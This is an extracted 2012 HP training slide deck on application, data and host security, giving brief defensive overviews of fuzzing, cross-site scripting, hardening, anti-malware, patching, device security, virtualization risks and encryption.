Beruflich Dokumente
Kultur Dokumente
0 Application, Data
and Host Security
Copyright 2012 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice.
Fuzzing
Secure coding concepts
Error and exception handling
Input validation
Cross-site scripting prevention
Cross-site Request Forgery (XSRF) prevention
Application configuration baseline (proper settings)
Application hardening
Application patch management
Copyright 2012 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice.
Fuzzing
Most applications that are written to accept input expect a particular type of data to be
givenstring values, numerical values, and so on. Sometimes, it is possible to enter
unexpected values and cause the application to crash. When that happens, it may be
possible for the user to be left with elevated privileges or access to values they should not
have. Fuzzing is the technique of providing unexpected values as input to an application
to try to make it crash. Those values can be random, invalid, or just unexpected, and a
common method is to flood the input with a stream of random bits.
The best way to prevent fuzzing from being an exploit possible on your systems is to do
fuzz testing to find and fix the problems first.
Copyright 2012 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice.
Copyright 2012 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice.
Copyright 2012 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice.
Cross-Site Scripting
Using a client-side scripting language, it is possible for a ne'er-do-well to trick a
user into visiting their site and have code then execute locally. When this is
done, it is known as cross-site scripting (XSS).
The best protection against cross-site scripting is to disable the running of
scripts.
Copyright 2012 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice.
Copyright 2012 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice.
Copyright 2012 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice.
Application hardening
Application hardening helps ensure that vulnerabilities are minimized. Make
sure you run only the applications and services that are needed to support
your environment. Attackers can target application protocols. Many of the
newer systems offer a rich environment for end users, and each protocol
increases your risk.
Copyright 2012 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice.
10
Copyright 2012 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice.
Anti-virus
Anti-spam
Anti-spyware
Pop-up blockers
Host-based firewalls
Patch management
Hardware security
Cable locks
Safe
Locking cabinets
Screen lock
Strong password
Device encryption
Remote wipe/sanitation
Voice encryption
GPS tracking
Virtualization
11
12
Copyright 2012 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice.
Anti-malware
Install Antivirus Software Antivirus software should be installed and definitions kept
current on all hosts. Antivirus software should run on the server as well as on every
workstation. In addition to active monitoring of incoming files, scans should be conducted
regularly to catch any infections that have slipped through.
Install Antispam Filters It is estimated that over 98 percent of all email is now spam.
Spam filters are needed to keep the majority of this unwanted email from reaching the
users.
Install Antispyware Software Some antispyware software is combined with antivirus
packages, while other programs are available as standalones. Regardless of the type you
use, you must regularly look for spyware (often identified by the presence of tracking
cookies) on hosts and remove those that get installed.
Utilize Pop-up Blockers Pop-ups are not only irritating but also a security threat. Pop-ups
(including pop-unders) represent unwanted programs running on the system and can
jeopardize well-being.
Employ Host-Based Firewalls A firewall is the first line of defense against attackers and
malware. Almost every current operating system includes a firewall, and most are turned
on by default.
13
Copyright 2012 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice.
Patch management
Updates help keep operating systems up to the most current revision level. Researching
updates is important to stay protected from newly discovered threats; when possible, so
is getting feedback from other users before you install an update so you can learn form
their experiences what difficulties may be encountered.
Hotfixes
Hotfixes are used to make repairs to a system during normal operation, even though they
might require a reboot
Service Pack
A service pack or support pack (depending upon the vendor) is a comprehensive set of
fixes consolidated into a single product.
Patches
A patch is a temporary or quick fix to a program. Patches may be used to temporarily
bypass a set of instructions that have malfunctioned. Several OS manufacturers issue
patches that can either be manually applied or applied using a disk file to fix a program.
14
Copyright 2012 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice.
Hardware security
Cable locks
15
Safe
Locking cabinets
Copyright 2012 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice.
16
Copyright 2012 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice.
Mobile devices
Screen lock
Strong password
Device encryption
Remote wipe/sanitation
Voice encryption
17
Copyright 2012 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice.
Virtualization
Virtualization technology allows you to take any single physical device and hide its
characteristics from usersin essence allowing you to run multiple items on one device
and make them appear as if they are stand-alone entities.
Breaking Out of the Virtual Machine If a malcontent could break out of the
virtualization layer and be able to access the other virtual machines, they could access
data they should never have access to.
Network and Security Controls Can Intermingle The tools used to administer the
virtual machine may not have the same granularity as those used to manage the network.
This could lead to privilege escalation and a compromise of security.
18
Copyright 2012 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice.
Full disk
Database
Individual files
Removable media
Mobile devices
19
Copyright 2012 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice.
20
Copyright 2012 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice.
Data encryption
Full disk
Database
Individual files
Removable media
Mobile devices
21
Copyright 2012 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice.
Copyright 2012 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice.
Questions??
Copyright 2012 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice.
24
Copyright 2012 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice.